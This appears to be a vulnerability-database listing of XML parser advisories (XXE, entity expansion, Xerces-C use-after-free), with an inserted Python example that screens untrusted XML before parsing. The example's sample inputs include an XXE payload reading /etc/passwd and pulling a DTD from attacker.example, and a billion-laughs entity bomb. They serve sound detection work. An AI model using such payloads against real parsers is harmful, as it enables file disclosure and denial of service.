
2729 matches found

IBM Security Bulletins
added 2021/01/20 5:30 a.m. | 31 views

Security Bulletin: IBM App Connect Enterprise & IBM Integration Bus are affected by vulnerabilities in Apache Xerces-C 3.0.0 to 3.2.2 XML parser (CVE-2018-1311)

Summary: Vulnerabilities in the Apache Xerces-C 3.0.0 to 3.2.2 XML parser affect IBM Integration Bus and IBM App Connect Enterprise. IBM App Connect Enterprise and IBM Integration Bus have addressed the applicable CVEs. Vulnerability Details: CVEID: CVE-2018-1311. DESCRIPTION: Apache Xerces-C could allo...

CVSS 8.1 | AI score 1.4 | EPSS 0.09503
Exploits 0
RedHat Linux
added 2021/01/20 4:38 a.m. | 126 views

Important: Red Hat Security Advisory: OpenShift Container Platform 4.5.27 packages and security update

Red Hat OpenShift Container Platform release 4.5.27 is now available with updates to packages and images that fix several bugs and add enhancements. This release also includes a security update for Red Hat OpenShift Container Platform 4.5. Red Hat Product Security has rated this update as having ...

CVSS 6.5 | AI score 6.7 | EPSS 0.02269
Exploits 0 | References 9
RedHat Linux
added 2021/01/20 4:38 a.m. | 2 views

jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks

A flaw was found in the mercurial plugin in Jenkins. The XML changelog parser is not configured to prevent XML external entity (XXE) attacks, allowing an attacker able to control an agent process to have Jenkins parse a crafted changelog file that uses external entities for extraction of...

CVSS 6.5 | AI score 5.8 | EPSS 0.01435
Exploits 0 | References 5
Tenable Nessus
added 2021/01/20 12:00 a.m. | 69 views

RHEL 7 : OpenShift Container Platform 4.5.27 (RHSA-2021:0034)

The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2021:0034 advisory. Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or privat...

CVSS 6.5 | AI score 7.3 | EPSS 0.02269
Exploits 0 | References 17
RedHat Linux
added 2021/01/18 4:04 p.m. | 2 views

jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks

A flaw was found in the subversion Jenkins plugin. The XML parser is not properly configured to prevent XML external entity (XXE) attacks, allowing an attacker able to control an agent process to have Jenkins parse a crafted changelog file that uses external entities for extraction of secret...

CVSS 6.5 | AI score 7.1 | EPSS 0.01466
Exploits 0 | References 5
Tenable Nessus
added 2021/01/18 12:00 a.m. | 40 views

RHEL 7 / 8 : OpenShift Container Platform 4.6.12 (RHSA-2021:0038)

The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2021:0038 advisory. Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or...

CVSS 7.5 | AI score 6.8 | EPSS 0.03813
Exploits 0 | References 16
NVD
added 2021/01/14 3:15 p.m. | 20 views

CVE-2021-23926

The XML parsers used by XMLBeans up to version 2.6.0 did not set the properties needed to protect the user from malicious XML input. Vulnerabilities include possibilities for XML Entity Expansion attacks. Affects XMLBeans up to and including v2.6.0...

CVSS 9.1 | AI score 9.3 | EPSS 0.06266
Exploits 0 | References 8
UbuntuCve
added 2021/01/14 3:15 p.m. | 64 views

CVE-2021-23926

The XML parsers used by XMLBeans up to version 2.6.0 did not set the properties needed to protect the user from malicious XML input. Vulnerabilities include possibilities for XML Entity Expansion attacks. Affects XMLBeans up to and including v2.6.0...

CVSS 9.1 | AI score 6.8 | EPSS 0.06266
Exploits 0 | References 3
Prion
added 2021/01/12 9:15 p.m. | 21 views

Code injection

A vulnerability has been identified in JT2Go (All versions < V13.1.0) and Teamcenter Visualization (All versions < V13.1.0). When opening a specially crafted XML file, the application could disclose arbitrary files to remote attackers. This is because of the passing of specially crafted content to the...

CVSS 4.3 | AI score 6.6 | EPSS 0.02586
Exploits 0 | References 2 | Affected software 2
Tenable Nessus
added 2021/01/06 12:00 a.m. | 260 views

IBM HTTP Server 7.0.0.0 <= 7.0.0.45 / 8.0.0.0 <= 8.0.0.15 / 8.5.0.0 < 8.5.5.17 / 9.0.0.0 < 9.0.5.1 Multiple Vulnerabilities (964768)

The version of IBM HTTP Server running on the remote host is affected by multiple vulnerabilities as follows: - In libexpat in Expat before 2.2.7, XML input including XML names that contain a large number of colons could make the XML parser consume a high amount of RAM and CPU resources while...

CVSS 7.8 | AI score 6.3 | EPSS 0.81466
Exploits 6 | References 4
Veracode
added 2021/01/01 3:24 a.m. | 19 views

XML External Entity (XXE)

plone.app.dexterity is vulnerable to XML External Entity (XXE) injection. An attacker with the Manager role is able to submit requests on behalf of the server and gain access to internal resources. The vulnerability exists when XML input containing a reference to an external entity is processed by a weakly configur...

CVSS 8.8 | AI score 4.2 | EPSS 0.01066
Exploits 0 | References 3 | Affected software 1
Veracode
added 2020/12/31 4:29 a.m. | 33 views

XML External Entity (XXE)

Nokogiri is vulnerable to an XML external entity (XXE) attack. The vulnerability exists because external DTDs are enabled by default in the XML parser, which would allow an attacker to submit requests on behalf of the server and gain access to internal and local resources...

CVSS 4.3 | AI score 4.4 | EPSS 0.01293
Exploits 0 | References 8 | Affected software 3
Cvelist
added 2020/12/30 12:00 a.m. | 31 views

CVE-2020-26247 XXE in Nokogiri

Nokogiri is a Rubygem providing HTML, XML, SAX, and Reader parsers with XPath and CSS selector support. In Nokogiri before version 1.11.0.rc4 there is an XXE vulnerability. XML Schemas parsed by Nokogiri::XML::Schema are trusted by default, allowing external resources to be accessed over the...

CVSS 2.6 | AI score 5.8 | EPSS 0.01293
Exploits 0 | References 8
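The Jenkins plugin, XMLBeans, plone.app.dexterity and Nokogiri entries above all describe one class of defect: an XML parser that accepts a DTD from untrusted input and then either resolves external entities (XXE, the SYSTEM/PUBLIC case) or expands deeply nested internal entities (entity expansion, the "billion laughs" case). The parser's own settings (refusing DOCTYPE declarations, disabling external general and parameter entities, no network access) remain the primary fix for each product listed. The block below is an added example, not code from any of those projects or advisories: a pre-parse triage step that scans the raw bytes for DOCTYPE and ENTITY declarations, reports external entities, and computes the fully expanded size of each internal entity before the document reaches a parser, so an oversized or externally referencing DTD is rejected (or logged) without ever being expanded. The three sample documents, including the attacker.example host and /etc/passwd path, are constructed for the example; the regular expressions are a heuristic text scan, not a conforming DTD parser.

```python
"""Pre-parse triage of untrusted XML for DTD-driven attacks.

Added example, not code from any advisory or project listed on the page.
Detects external entities (XXE) and estimates internal entity expansion
(billion laughs) by scanning the DTD text before any parser sees it.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample documents (not taken from any advisory).
BENIGN = b'<?xml version="1.0"?><order id="42"><item sku="A-1"/></order>'

XXE = b"""<?xml version="1.0"?>
<!DOCTYPE foo [
 <!ENTITY xxe SYSTEM "file:///etc/passwd">
 <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd">
 %dtd;
]>
<foo>&xxe;</foo>"""

BILLION_LAUGHS = b"""<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>"""

DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
# <!ENTITY [%] name [SYSTEM "uri" | PUBLIC "pubid" "uri" | "literal value"]>
ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(?P<param>%\s+)?(?P<name>[^\s%>]+)\s+"
    rb"(?P<ext>(?:SYSTEM|PUBLIC\s+(?:\"[^\"]*\"|'[^']*'))\s+)?"
    rb"(?P<q>[\"'])(?P<value>.*?)(?P=q)",
    re.DOTALL,
)
REF_RE = re.compile(rb"&([^\s&;]+);")  # general entity reference inside a value


def analyze_dtd(data: bytes) -> dict:
    """Report DOCTYPE presence, external entities, and the largest fully
    expanded internal entity (in bytes) without expanding anything.
    Raises ValueError on recursive entity references, which XML forbids."""
    internal, external = {}, []
    for m in ENTITY_RE.finditer(data):
        label = ("%" if m.group("param") else "") + m.group("name").decode("latin-1")
        if m.group("ext"):
            external.append(label)          # SYSTEM/PUBLIC: the XXE vector
        elif not m.group("param"):
            internal[m.group("name")] = m.group("value")  # parameter entities are not expanded in content

    sizes = {}

    def expanded(name: bytes, stack: tuple) -> int:
        if name in stack:
            raise ValueError("recursive entity " + name.decode("latin-1"))
        if name in sizes:
            return sizes[name]
        value, total, last = internal[name], 0, 0
        for ref in REF_RE.finditer(value):
            total += ref.start() - last
            target = ref.group(1)
            # Known entity: add its expanded size; unknown (e.g. &amp;): count literally.
            total += expanded(target, stack + (name,)) if target in internal else len(ref.group(0))
            last = ref.end()
        total += len(value) - last
        sizes[name] = total
        return total

    return {
        "doctype": bool(DOCTYPE_RE.search(data)),
        "external_entities": external,
        "max_expansion": max((expanded(n, ()) for n in internal), default=0),
    }


def check_untrusted_xml(data: bytes, allow_dtd: bool = False, max_expansion: int = 10_000) -> list:
    """Return the reasons to refuse the document (empty list means accept).
    Default policy: no DTD at all. If a DTD must be allowed, still refuse
    external entities and bound the expansion size."""
    try:
        report = analyze_dtd(data)
    except ValueError as exc:
        return [str(exc)]
    reasons = []
    if report["doctype"] and not allow_dtd:
        reasons.append("DOCTYPE declaration present")
    if report["external_entities"]:
        reasons.append("external entities: " + ", ".join(report["external_entities"]))
    if report["max_expansion"] > max_expansion:
        reasons.append(f"entity expansion {report['max_expansion']} bytes exceeds {max_expansion}")
    return reasons


def safe_parse(data: bytes, **policy) -> ET.Element:
    """Parse only after the pre-check passes (defence in depth; the parser's
    own DTD and external-entity settings stay the primary control)."""
    reasons = check_untrusted_xml(data, **policy)
    if reasons:
        raise ValueError("refusing XML: " + "; ".join(reasons))
    return ET.fromstring(data)


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("xxe", XXE), ("billion laughs", BILLION_LAUGHS)):
        print(label, check_untrusted_xml(doc, allow_dtd=True) or "accepted")
```

For the constructed billion-laughs document the analyzer reports an expansion of 3000 bytes from a 10 x 10 x 10 fan-out over a 3-byte leaf, which is the figure that grows to gigabytes when the classic payload uses nine levels; the XXE sample is flagged for both a general entity (`xxe`) and a parameter entity (`%dtd`) with external identifiers. The scan deliberately ignores character references and declarations hidden in comments, so treat a clean result as "nothing obvious", not as proof of safety, and keep the parser itself configured to refuse DTDs.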
Tenable Nessus
added 2020/12/18 12:00 a.m. | 35 views

Debian DLA-2498-1 : xerces-c security update

The UK's National Cyber Security Centre (NCSC) discovered that Xerces-C, a validating XML parser library for C++, contains a use-after-free error triggered during the scanning of external DTDs. An attacker could cause a denial of service (DoS) and possibly achieve remote code execution. This flaw has...

CVSS 8.1 | AI score 7.6 | EPSS 0.09503
Exploits 0 | References 4
Tenable Nessus
added 2020/12/18 12:00 a.m. | 32 views

Debian DSA-4814-1 : xerces-c - security update

It was discovered that xerces-c, a validating XML parser library for C++, did not correctly scan DTDs. The use-after-free vulnerability resulting from this issue would allow a remote attacker to leverage a specially crafted XML file in order to crash the application or potentially execute arbitra...

CVSS 8.1 | AI score 8.1 | EPSS 0.09503
Exploits 0 | References 5
OpenVAS
added 2020/12/18 12:00 a.m. | 24 views

Debian: Security Advisory (DLA-2498-1)

The remote host is missing an update for the Debian xerces-c package announced via DLA-2498-1...

CVSS 8.1 | AI score 8.1 | EPSS 0.09503
Exploits 0 | References 4
Debian
added 2020/12/17 12:38 p.m. | 54 views

[SECURITY] [DLA 2498-1] xerces-c security update

Debian LTS Advisory DLA-2498-1 | [email protected] | https://www.debian.org/lts/security/ | December 17, 2020 | https://wiki.debian.org/LTS ...

CVSS 8.1 | AI score 8.5 | EPSS 0.09503
Exploits 0
Debian
added 2020/12/17 7:27 a.m. | 34 views

[SECURITY] [DSA 4814-1] xerces-c security update

Debian Security Advisory DSA-4814-1 | [email protected] | https://www.debian.org/security/ | Sebastien Delafond | December 17, 2020 | https://www.debian.org/security/faq ...

CVSS 6.8 | AI score 1.7 | EPSS 0.09503
Exploits 0
Debian
added 2020/12/17 7:27 a.m. | 64 views

[SECURITY] [DSA 4814-1] xerces-c security update

Debian Security Advisory DSA-4814-1 | [email protected] | https://www.debian.org/security/ | Sebastien Delafond | December 17, 2020 | https://www.debian.org/security/faq ...

CVSS 8.1 | AI score 8.5 | EPSS 0.09503
Exploits 0
Tenable Nessus
added 2020/12/09 12:00 a.m. | 27 views

NewStart CGSL CORE 5.05 / MAIN 5.05 : xerces-c Vulnerability (NS-SA-2020-0114)

The remote NewStart CGSL host, running version CORE 5.05 / MAIN 5.05, has xerces-c packages installed that are affected by a vulnerability: - The Apache Xerces-C 3.0.0 to 3.2.3 XML parser contains a use-after-free error triggered during the scanning of external DTDs. This flaw has not been...

CVSS 8.1 | AI score 7.5 | EPSS 0.09503
Exploits 0 | References 2